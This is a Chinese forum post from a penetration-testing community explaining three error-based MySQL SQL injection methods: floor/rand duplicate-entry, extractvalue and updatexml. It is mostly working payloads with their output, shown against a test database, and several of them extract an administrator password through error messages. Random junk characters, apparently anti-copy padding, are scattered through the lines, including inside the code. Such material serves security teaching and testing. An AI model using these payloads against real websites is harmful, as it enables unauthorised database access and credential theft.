中国网络渗透测试联盟

标题: 关于Mysql注入过程中的三种报错方式 [打印本页]
作者: admin    时间: 2012-12-10 10:28
标题: 关于Mysql注入过程中的三种报错方式
放点原来的笔记,Mysql在执行语句的时候会抛出异常信息信息,而php+mysql架构的网站往往又将错误代码显示在页面上,这样可以通过构造如下三种方法获取特定数据。0 A) \' k7 k# T) x. p6 r$ o
实际测试环境:
5 c% w, l/ x2 w; L
9 y( ]: h  F1 ~
0 V* y$ R3 ?# B; R% O  ^! Rmysql> show tables;
+ h, y: r; ~  Z% F/ Y  F" e+----------------+* |+ l+ z* F- O$ m& ^- d" A
| Tables_in_test |
7 w+ z9 j1 i- H8 R! }+----------------+
! v/ e1 M1 t3 i3 W| admin          |$ D( J, M# k# o5 S2 p8 n# R
| article        |% a: }( f7 X( ^
+----------------+; p) O) W4 D! c( m

. e3 a& R' T/ n& X* Y0 o. |
; I  U9 z3 c4 x6 M/ ?' e
& a' K$ Q( p6 w$ h( N0 B8 `7 Pmysql> describe admin;$ w6 P& p% f! E, Z9 P1 g
+-------+------------------+------+-----+---------+----------------+* V: ?0 ~4 g/ Q( u/ L
| Field | Type             | Null | Key | Default | Extra          |  H' p0 |+ o# G/ E& t% b% W
+-------+------------------+------+-----+---------+----------------+# B9 ?& h4 s4 z" q2 P
| id    | int(10) unsigned | NO   | PRI | NULL    | auto_increment |( q3 ^: B0 t6 o
| user  | varchar(50)      | NO   |     | NULL    |                |5 Z: h# D  N$ S1 p2 `; V' ~/ x
| pass  | varchar(50)      | NO   |     | NULL    |                |
. J' X2 M5 Z& g9 I! d, Z2 o+-------+------------------+------+-----+---------+----------------+8 ?3 m$ b% v. Q( v8 n  T# X
) h8 {" r- w! i0 x4 q' H
& w+ e6 a. B6 o# s. y
" o# g/ h, o2 ?6 ^, F
mysql> describe article;
% J' k$ ?) X( B+ K) c; Q6 f, P+---------+------------------+------+-----+---------+----------------+
2 f' C; ]7 [( m| Field   | Type             | Null | Key | Default | Extra          |
2 Y' t- u: A& z9 Y7 v) r+---------+------------------+------+-----+---------+----------------+
( E0 C6 n7 x5 x$ d' ~; O5 z| id      | int(10) unsigned | NO   | PRI | NULL    | auto_increment |# ~: w+ a2 f3 l- s) W% v7 w
| title   | varchar(50)      | NO   |     | NULL    |                |
( L7 u, y6 |4 A+ ]| content | varchar(50)      | NO   |     | NULL    |                |
$ L* J! }! p) z; V' |/ d4 P+---------+------------------+------+-----+---------+----------------+
2 l4 D5 M' b% o9 {: c' U& |( N1、通过floor报错
9 ?9 ~1 l- k' ~3 r; j8 Q可以通过如下一些利用代码
( G) p, ?+ u  R# b/ x % m* F; O- a' Q% Y  ?* F
# T9 A' F! Q4 }- J
and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x
* S' {; }: c+ z5 w9 bfrom information_schema.tables group by x)a);5 d3 ]  }4 O4 m9 E: E

7 B2 [! H3 t5 h8 |, `  e# p 2 b6 ~$ B# s/ k" E; D* }4 O0 R
and (select count(*) from (select 1 union select null union select !1)x
+ M0 C* ^  x6 F) v  K3 L& x, Z4 Wgroup by concat((select table_name from information_schema.tables limit 1),
( ~& e$ n$ O/ x/ Q5 s/ wfloor(rand(0)*2)));
# _* |9 h* G# l. f- b- {举例如下:& A6 h  x6 X6 v* v
首先进行正常查询:
$ m0 k1 o. Q; H& e) |
" H+ |) J  V6 Cmysql> select * from article where id = 1;$ w6 `; |- c; C3 t0 C/ Y
+----+-------+---------+
$ v- [4 I: D' N8 @| id | title | content |- T" \" |; f& W7 c2 }
+----+-------+---------+
) `3 W& j* H% O( z3 h# {|  1 | test  | do it   |
. ?3 W, D8 k, W+----+-------+---------+7 o% x5 \% Z6 O' }7 X3 C. R
假如id输入存在注入的话,可以通过如下语句进行报错。
  A  a6 A, T# }1 m4 l+ K3 \8 ~ 3 L9 t" O' t; Z5 P9 N: C

" a8 I+ }; o8 N* K2 v: h$ i/ kmysql> select * from article where id = 1 and (select 1 from& I! g9 [6 c4 p" }$ P) ]2 Q
(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
  ~3 u# u8 y" @, W- u$ M7 FERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'
3 Q: y% w2 i; L可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。! \* P1 o9 _1 Q6 C! b" w. V
例如我们需要查询管理员用户名和密码:" l* ^. f& o: N" D$ o- C$ h
Method1:
% b6 L+ X8 |4 t+ r
6 {- ~) Z0 K" y+ j- o0 `& Z ( G, @& G! T; {" J9 n
mysql> select * from article where id = 1 and (select 1 from. z2 ]% i! ^' c% G
(select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x
$ |& H9 C* @7 J" V  s, ~: D" Efrom information_schema.tables group by x)a);
/ u4 ]" v6 x) L  YERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
! m  l6 X! g: M6 G/ I2 J6 K" pMethod2:
0 b! D+ ]& S) ]# G: J & i- I3 g1 v4 G' z' U8 d+ T% F4 @

6 T. J: D; y& m$ q7 z# Q* _5 Bmysql> select * from article where id = 1 and (select count(*)
# l9 i' @( t  |. z% yfrom (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),3 t. e: E. S' S" T- c
floor(rand(0)*2)));
& C- n7 @0 L4 V( S. |# DERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
- |- {; b. V: r* ?2、ExtractValue7 H0 L! [/ W4 K/ e: D( F
测试语句如下
( y7 b+ Y% u) C6 \  d 9 {6 _0 }* ?) u# I" K/ U% |
1 N) ^2 v3 ?* s; G6 v7 p
and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));
, T+ W0 Z: R- h实际测试过程
7 b( p/ b+ }1 i/ b9 t* ^ 9 Z( ]# s7 C- D

" Y' r) q( X9 b5 H! O- r* ^9 d4 hmysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,
) f/ b6 n. S! R0 B6 R" |4 |+ o. L(select pass from admin limit 1)));--5 G0 I* A4 l$ s' v$ \
ERROR 1105 (HY000): XPATH syntax error: '\admin888'/ |* |; R' m( f* ]
3、UpdateXml6 V% F3 z% B! C; t* z
测试语句
% p5 x! ]7 U% e0 w8 s+ X
: s/ A% y7 R9 I% ~, V. m- Y& d 0 |, X3 s5 A2 z' f
and 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))
0 u9 |+ ~: O1 w! m/ I6 p实际测试过程
% _9 i# u/ N9 U! b& c* a
, L" v! o$ ^0 ^3 g+ E' M ! I* |3 }, k) t& U/ K
mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,: g( a6 F/ j4 V3 ]. J- F1 ~
(select pass from admin limit 1),0x5e24),1));
7 a; p9 ]& I* G0 _ERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'
% z  L* d- d2 [5 u2 yAll, thanks foreign guys.
0 \) {. ~! I! Y2 B5 l& R7 z
7 T6 `1 }+ ?: ~( Z' }6 k/ d8 S
0 c$ k2 n9 c. |% p0 p



欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2